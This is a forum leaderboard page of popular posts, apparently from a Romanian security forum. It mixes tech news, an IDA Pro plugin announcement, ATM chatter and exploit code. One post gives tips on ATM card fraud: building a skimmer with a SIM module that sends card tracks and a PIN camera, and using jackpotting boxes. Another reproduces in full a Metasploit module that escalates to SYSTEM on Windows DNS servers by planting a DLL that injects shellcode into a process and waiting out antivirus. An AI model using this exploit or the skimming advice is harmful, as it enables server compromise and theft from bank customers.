Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 09/11/20 in all areas

  1. Salut, Subscriu la cele spuse de @aelius : - requesturile sunt facute catre roundcubes.net, care se comporta ca un proxy, nu vei vedea niciun request catre site-urile de anunturi. - chiar dc ai patchui validarea licentei, tot nu ai primi token de sesiune, astfel patchul va avea o valoare nula, doar nu iti va fi afisata eroare. Poti ruga pe cineva sa iti faca o aplicatie de automatizare, dar cum zicea @Nytrolicenta de 10 euro e destul de ieftina. Caz inchis, succes in continuare!
    4 points
  2. Bancomatele din Otopeni, jefuite de politisti, ca aveau datorii la clanuri
    2 points
  3. Facebook has chosen to review user data requests manually, without screening the email address of people who request access to the portals, which are made for law enforcement agents only. Anyone with an email address can get into Facebook and WhatsApp law enforcement portals, designed for law enforcement agents to file requests for user data. Getting into the two portals doesn't grant people access to any user information, nor any sensitive information about the company. But the portals are not designed to filter email addresses in any way, leaving the door open to spammers to freely access the portals and send fake requests. Last week, security researcher Jacob Riggs discovered that he could get access to the two portals with any email address. All he needed to do was enter his email address, submit it to the portals, and then click on a confirmation link he received in his inbox. Once he did that, he could request records using the forms below. A SCREENSHOT OF FACEBOOK'S PORTAL FOR LAW ENFORCEMENT AGENTS TO REQUEST USER DATA. (IMAGE: JACOB RIGGS) A SCREENSHOT OF WHATSAPP'S PORTAL FOR LAW ENFORCEMENT AGENTS TO REQUEST USER DATA. (IMAGE: JACOB RIGGS) Motherboard was able to reproduce Rigg's findings. Riggs reported the issue to Facebook, thinking it was due to a design flaw that needed to be fixed. Facebook, however, told Riggs and Motherboard that this was a feature, not a bug. The spokesperson added that the system does reject some email domains and has other rules to prevent spam. In other words, Facebook prefers to let anyone submit a request and then check that it's real and legal, rather than block them with an automated system or require agents to register. In any case, both Facebook and Instagram's portals include a note to discourage potential spammers, warning them that only "governmental entities authorized to obtain evidence in connection with official legal proceedings" can file requests. Google's law enforcement portal, for comparison, only allows "verified" law enforcement agents to submit user data, according to the company's site. In fact, Riggs could not get into the Google portal using his personal email address. Tech companies routinely receive and process legitimate data requests through these portals. In its latest transparency report, which includes data requests for Facebook, Facebook Messenger, Instagram, WhatsApp, and Oculus, and which covers the last six months of 2019, the company revealed that it had received 140,875 requests for user data. Source
    2 points
  4. 1.Un skimmer la ora actuala îl poți face cu un buget de 500€. Ma refer unu deștept cu sim care sa îți trimită trackurile și o camera bună pt pin. Nu se mai merita cu tastatura. 2. Jackpot. urile (aka Blackbox) sunt cele mai eficiente. 3. Ce fac ei este o forma foarte agresiva de atac. 4. Atm forking dacă nu te duce capul sa programezi un pi.
    2 points
  5. Studying decompiler internals has never been so easy... Recently, we blogged about the Hex-Rays microcode that powers the IDA Pro decompiler. We showed how a few days spent hacking on the microcode API could dramatically reduce the cost of certain reverse engineering tasks. But developing for the microcode API can be challenging due to the limited examples to crib from, and the general complexity of working with decompiler internals. Today, we are publishing a developer-oriented plugin for IDA Pro called Lucid. Lucid is an interactive Hex-Rays microcode explorer that makes it effortless to study the optimizations of the decompilation pipeline. We use it as an aid for developing and debugging microcode-based augmentations. Lucid is a Hex-Rays microcode explorer for microcode plugin developers Usage Lucid requires IDA 7.5. It will automatically load for any architecture with a Hex-Rays decompiler present. Simply right click anywhere in a Pseudocode window and select View microcode to open the Lucid Microcode Explorer. Lucid adds a right click 'View microcode' context menu entry to Hex-Rays Pseudocode windows By default, the Microcode Explorer will synchronize with the last active Hex-Rays Pseudocode window. This can be toggled on / off in the ‘Settings’ groupbox of the explorer window. 'Basically Magic' Lucid’s advantage over the existing microcode explorers is that it is backed by a complete text-to-microcode structure mapping. This means that a cursor position in the rendered microcode text can be used to retrieve the underlying microinstruction, sub-instruction, or sub-operand under the user cursor (and vice versa). As the chief example, we use these mappings to help the explorer ‘project’ the user cursor through the layers, maintaining focus on the selected instruction or operand as it flows through the decompilation pipeline: Scrolling through the microcode maturity layers while tracking a specific operand At the end of the day, the intention is to provide more natural experiences for studying the microcode and developing related tooling. This is just one example of how we might ‘get there.’ Sub-instruction Graphs Lucid was originally created to serve as an interactive platform for lifting late-stage microcode expressions and generalizing them into ‘optimization’ patterns for the decompiler (think inline call detection/rewriting). While I am not sure I’ll find the time/motivation to revisit this area of research, Lucid does include a rudimentary feature (inspired by genmc) to view the sub-instruction tree of a given microinstruction which is still useful by itself. Viewing the sub-instruction tree of a given microinstruction You can view these individual trees by right clicking an instruction and selecting View subtree. Bits and Bobs The code for Lucid is available on github where it has been licensed permissively under the MIT license. As the initial release, the codebase is a bit messy and the README contains a few known issues/bugs at the time of publication. Finally, there is no regular development scheduled for this plugin (outside of maintenance) but I always welcome external contributions, issues, and feature requests. Conclusion In this post, we presented a new IDA Pro plugin called Lucid. It is a developer-oriented plugin designed to aid in the research and development of microcode-based plugins/extensions for the Hex-Rays decompiler. Our experience developing for these technologies is second to none. RET2 is happy to consult in these spaces, providing plugin development services, the addition of custom features to existing works, or other unique opportunities with regard to security tooling. If your organization has a need for this expertise, please feel free to reach out. Source
    1 point
  6. ^ n-auzi Pasarica ca a zguduit tot orasul, au exagerat cu TNT-ul, au ramas numai cateva cifre din serii, posibil sa fi fost atentat terorist, ipoteza asta nu ai luat-o in calcul?
    1 point
  7. This Metasploit module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the ServerLevelPluginDll value using dnscmd.exe to create a registry key at HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ named ServerLevelPluginDll that can be made to point to an arbitrary DLL. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'metasploit/framework/compiler/windows' class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Services include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation', 'Description' => %q{ This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\` named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended when using a UNC path. Users should note that if the DLLPath variable of this module is set to a UNC share that does not exist, the DNS server on the target will not be able to restart. Similarly if a UNC share is not utilized, and users instead opt to drop a file onto the disk of the target computer, and this gets picked up by Anti-Virus after the timeout specified by `AVTIMEOUT` expires, its possible that the `ServerLevelPluginDll` value of the `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\` key on the target computer may point to an nonexistant DLL, which will also prevent the DNS server from being able to restart. Users are advised to refer to the documentation for this module for advice on how to resolve this issue should it occur. This module has only been tested and confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows Server version up to and including Windows Server 2019. }, 'References' => [ ['URL', 'https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83'], ['URL', 'https://adsecurity.org/?p=4064'], ['URL', 'http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html'] ], 'DisclosureDate' => 'May 08 2017', 'License' => MSF_LICENSE, 'Author' => [ 'Shay Ber', # vulnerability discovery 'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module ], 'Platform' => 'win', 'Targets' => [[ 'Automatic', {} ]], 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'WfsDelay' => 20, 'EXITFUNC' => 'thread' }, 'Notes' => { 'Stability' => [CRASH_SERVICE_DOWN], # The service can go down if AV picks up on the file at an # non-optimal time or if the UNC path is typed in wrong. 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] } ) ) register_options( [ OptString.new('DLLNAME', [ true, 'DLL name (default: msf.dll)', 'msf.dll']), OptString.new('DLLPATH', [ true, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', '%TEMP%']), OptBool.new('MAKEDLL', [ true, 'Just create the DLL, do not exploit.', false]), OptInt.new('AVTIMEOUT', [true, 'Time to wait for AV to potentially notice the DLL file we dropped, in seconds.', 60]) ] ) deregister_options('FILE_CONTENTS') end def check if sysinfo['OS'] =~ /Windows 20(03|08|12|16\+|16)/ vprint_good('OS seems vulnerable.') else vprint_error('OS is not vulnerable!') return Exploit::CheckCode::Safe end username = client.sys.config.getuid user_sid = client.sys.config.getsid hostname = sysinfo['Computer'] vprint_status("Running check against #{hostname} as user #{username}...") srv_info = service_info('DNS') if srv_info.nil? vprint_error('Unable to enumerate the DNS service!') return Exploit::CheckCode::Unknown end if srv_info && srv_info[:display].empty? vprint_error('The DNS service does not exist on this host!') return Exploit::CheckCode::Safe end # for use during permission check if srv_info[:dacl].nil? vprint_error('Unable to determine permissions on the DNS service!') return Exploit::CheckCode::Unknown end dacl_items = srv_info[:dacl].split('D:')[1].scan(/\((.+?)\)/) vprint_good("DNS service found on #{hostname}.") # user must be a member of the DnsAdmins group to be able to change ServerLevelPluginDll group_membership = get_whoami unless group_membership vprint_error('Unable to enumerate group membership!') return Exploit::CheckCode::Unknown end unless group_membership.include? 'DnsAdmins' vprint_error("User #{username} is not part of the DnsAdmins group!") return Exploit::CheckCode::Safe end # find the DnsAdmins group SID dnsadmin_sid = '' group_membership.each_line do |line| unless line.include? 'DnsAdmins' next end vprint_good("User #{username} is part of the DnsAdmins group.") line.split.each do |item| unless item.include? 'S-' next end vprint_status("DnsAdmins SID is #{item}") dnsadmin_sid = item break end break end # check if the user or DnsAdmins group has the proper permissions to start/stop the DNS service if dacl_items.any? { |dacl_item| dacl_item[0].include? dnsadmin_sid } dnsadmin_dacl = dacl_items.select { |dacl_item| dacl_item[0].include? dnsadmin_sid }[0] if dnsadmin_dacl.include? 'RPWP' vprint_good('Members of the DnsAdmins group can start/stop the DNS service.') end elsif dacl_items.any? { |dacl_item| dacl_item[0].include? user_sid } user_dacl = dacl_items.select { |dacl_item| dacl_item[0].include? user_sid }[0] if user_dacl.include? 'RPWP' vprint_good("User #{username} can start/stop the DNS service.") end else vprint_error("User #{username} does not have permissions to start/stop the DNS service!") return Exploit::CheckCode::Safe end Exploit::CheckCode::Vulnerable end def exploit # get system architecture arch = sysinfo['Architecture'] if arch != payload_instance.arch.first fail_with(Failure::BadConfig, 'Wrong payload architecture!') end # no exploit, just create the DLL if datastore['MAKEDLL'] == true # copypasta from lib/msf/core/exploit/fileformat.rb # writes the generated DLL to ~/.msf4/local/ dllname = datastore['DLLNAME'] full_path = store_local('dll', nil, make_serverlevelplugindll(arch), dllname) print_good("#{dllname} stored at #{full_path}") return end # will exploit if is_system? fail_with(Failure::BadConfig, 'Session is already elevated!') end unless [CheckCode::Vulnerable].include? check fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!') end # if the DNS service is not started, it will throw RPC_S_SERVER_UNAVAILABLE when trying to set ServerLevelPluginDll print_status('Checking service state...') svc_state = service_status('DNS') unless svc_state[:state] == 4 print_status('DNS service is stopped, starting it...') service_start('DNS') end # the service must be started before proceeding total_wait_time = 0 loop do svc_state = service_status('DNS') if svc_state[:state] == 4 sleep 1 break else sleep 2 total_wait_time += 2 fail_with(Failure::TimeoutExpired, 'Was unable to start the DNS service after 3 minutes of trying...') if total_wait_time >= 90 end end # the if block assumes several things: # 1. operator has set up their own SMB share (SMB2 is default for most targets), as MSF does not support SMB2 yet # 2. operator has generated their own DLL with the correct payload and architecture # 3. operator's SMB share is accessible from the target. "Enable insecure guest logons" is "Enabled" on the target or # the target falls back to SMB1 dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip if datastore['DLLPATH'].start_with?('\\\\') # Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. build_num_raw = session.shell_command_token('cmd.exe /c ver') build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/) if build_num.nil? print_error("Couldn't retrieve the target's build number!") return else build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0] vprint_status("Target's build number: #{build_num}") end build_num_gemversion = Gem::Version.new(build_num) # If the target is running Windows 10 or Windows Server versions with a # build number of 16299 or later, aka v1709 or later, then we need to check # if "Enable insecure guest logons" is enabled on the target system as per # https://support.microsoft.com/en-us/help/4046019/guest-access-in-smb2-disabled-by-default-in-windows-10-and-windows-ser if (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) # check if "Enable insecure guest logons" is enabled on the target system allow_insecure_guest_auth = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters', 'AllowInsecureGuestAuth') unless allow_insecure_guest_auth == 1 fail_with(Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!") end end print_status('Using user-provided UNC path.') else write_file(dllpath, make_serverlevelplugindll(arch)) print_good("Wrote DLL to #{dllpath}!") print_status("Sleeping for #{datastore['AVTIMEOUT']} seconds to ensure the file wasn't caught by any AV...") sleep(datastore['AVTIMEOUT']) unless file_exist?(dllpath.to_s) print_error('Woops looks like the DLL got picked up by AV or somehow got deleted...') return end print_good("Looks like our file wasn't caught by the AV.") end print_warning('Entering danger section...') print_status("Modifying ServerLevelPluginDll to point to #{dllpath}...") dnscmd_result = cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll #{dllpath}").to_s.strip unless dnscmd_result.include? 'success' fail_with(Failure::UnexpectedReply, dnscmd_result.split("\n")[0]) end print_good(dnscmd_result.split("\n")[0]) # restart the DNS service print_status('Restarting the DNS service...') restart_service end def on_new_session(session) if datastore['DLLPATH'].start_with?('\\\\') return else if session.type == 'meterpreter' session.core.use('stdapi') unless session.ext.aliases.include?('stdapi') end vprint_status('Erasing ServerLevelPluginDll registry value...') cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll") print_good('Exited danger zone successfully!') dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip restart_service('session' => session, 'dllpath' => dllpath) end end def restart_service(opts = {}) # for deleting the DLL if opts['session'] && opts['dllpath'] session = opts['session'] dllpath = opts['dllpath'] end service_stop('DNS') # see if the service has really been stopped total_wait_time = 0 loop do svc_state = service_status('DNS') if svc_state[:state] == 1 sleep 1 break else sleep 2 total_wait_time += 2 fail_with(Failure::TimeoutExpired, 'Was unable to stop the DNS service after 3 minutes of trying...') if total_wait_time >= 90 end end # clean up the dropped DLL if session && dllpath && !datastore['DLLPATH'].start_with?('\\\\') vprint_status("Removing #{dllpath}...") session.fs.file.rm dllpath end service_start('DNS') # see if the service has really been started total_wait_time = 0 loop do svc_state = service_status('DNS') if svc_state[:state] == 4 sleep 1 break else sleep 2 total_wait_time += 2 fail_with(Failure::TimeoutExpired, 'Was unable to start the DNS service after 3 minutes of trying...') if total_wait_time >= 90 end end end def make_serverlevelplugindll(arch) # generate the payload payload = generate_payload # the C template for the ServerLevelPluginDll DLL c_template = %| #include <Windows.h> #include <stdlib.h> #include <String.h> BOOL APIENTRY DllMain __attribute__((export))(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) { switch (dwReason) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int DnsPluginCleanup __attribute__((export))(void) { return 0; } int DnsPluginQuery __attribute__((export))(PVOID a1, PVOID a2, PVOID a3, PVOID a4) { return 0; } int DnsPluginInitialize __attribute__((export))(PVOID a1, PVOID a2) { STARTUPINFO startup_info; PROCESS_INFORMATION process_info; char throwaway_buffer[8]; ZeroMemory(&startup_info, sizeof(startup_info)); startup_info.cb = sizeof(STARTUPINFO); startup_info.dwFlags = STARTF_USESHOWWINDOW; startup_info.wShowWindow = 0; if (CreateProcess(NULL, "C:\\\\Windows\\\\System32\\\\notepad.exe", NULL, NULL, FALSE, 0, NULL, NULL, &startup_info, &process_info)) { HANDLE processHandle; HANDLE remoteThread; PVOID remoteBuffer; unsigned char shellcode[] = "SHELLCODE_PLACEHOLDER"; processHandle = OpenProcess(0x1F0FFF, FALSE, process_info.dwProcessId); remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, 0x3000, PAGE_EXECUTE_READWRITE); WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL); remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); CloseHandle(process_info.hThread); CloseHandle(processHandle); } return 0; } | c_template.gsub!('SHELLCODE_PLACEHOLDER', Rex::Text.to_hex(payload.raw).to_s) cpu = nil case arch when 'x86' cpu = Metasm::Ia32.new when 'x64' cpu = Metasm::X86_64.new else fail_with(Failure::NoTarget, 'Target arch is not compatible') end print_status('Building DLL...') Metasploit::Framework::Compiler::Windows.compile_c(c_template, :dll, cpu) end end Source
    1 point
  8. The Windows 10 KB4571756 security update released yesterday is reportedly breaking Microsoft's Windows Subsystem for Linux 2 (WSL2) compatibility layer. This issue prevents Windows 10 2004 users from launching the Windows Terminal with WSL2, with the app crashing and throwing "Element not found" and "Process exited with code 4294967295" errors. Microsoft is yet to officially acknowledge this issue, but the number of reports coming from users that the error goes away after the update is uninstalled indicates that the Windows 10 2004 KB4571756 update is the one responsible. KB4571756 is a security update issued yesterday as part of the August 2020 Patch Tuesday release to address vulnerabilities in multiple Windows components and to deliver a number of improvements and fixes. With yesterday's security updates, Microsoft has also addressed two denial of service vulnerabilities (CVE-2020-0890 and CVE-2020-0904) affecting Windows Hyper-V — the company's native hypervisor for creating virtual machines and a component also used by WSL2. To install KB4571756, you can either check for updates via Windows Update or manually download it from the Microsoft Update Catalog. Admins can also distribute the update to enterprise endpoints using Windows Server Update Services (WSUS). On devices where automatic updates are enabled, KB4571756 will install automatically and you do not have to take any further actions. How to fix: uninstall the KB4571756 update Microsoft has not yet formally acknowledged the issue (no new support document has been published and no new known issues have been added to the Windows 10 health dashboard with info on this user reported problem). While an official fix for the problem is not yet available, luckily, according to affected Windows 10 users have found that uninstalling KB4571756 will restore WSL2 functionality. Before uninstalling the KB4571756 Cumulative Update, you should know that you would also remove mitigation for multiple security issues impacting your Windows 10 device. For those who are experiencing crashing problems when launching Windows Terminal with WSL2 after installing the KB4571756, the only way to resolve them at this time is to manually uninstall it. Microsoft says in the updates' details from the Update Catalog that it can be removed "by selecting View installed updates in the Programs and Features Control Panel." If you are willing to exchange a security downgrade over functional WSL2, you can follow these steps to uninstall the KB4571756 update: Select the start button or Windows Desktop Search and type update history and select View your Update history. On the Settings/View update history dialog window, Select Uninstall Updates. On the Installed Updates dialog window, find and select KB4571756, and then click the Uninstall button. Restart your Windows device. We also have a tutorial on how to uninstall, pause, or block Windows updates if they are causing issues after installing. BleepingComputer has reached out to Microsoft for comment but had not heard back at the time of this publication. Source
    1 point
  9. Am tot auzit de acel lucru cu marcarea banilor, dar oare e pe bune? Nu cred ca s-ar mai face atatea astfel de porcarii daca ar fi. Banii sunt tinuti in casete, fiecare caseta cu un anumit tip de bancnota. Dar nu am vazut sa fie altceva pe acolo (am vazut bancomat deschis, de aproape sa zicem). PS: Mai e un mit conform careia "Brrrrr"-ul acela cand sunt adusi banii ar fi doar un MP3, are cineva idee? De fapt asta e singura mea reala curiozitate legata de ATM-uri
    1 point
  10. Oricum nu au ce sa faca cu banii (daca sunt modele noi), la primul soc se sparg pernutele de ariel, se vor certa intre ei, se leaga singuri cretinii
    1 point
  11. Am nevoie de inca un invite code rapid ca mine e ziu la un prieten si vreau sa ii fac cadou daca ma puteti ajuta
    0 points
  12. 0 points
×
×
  • Create New...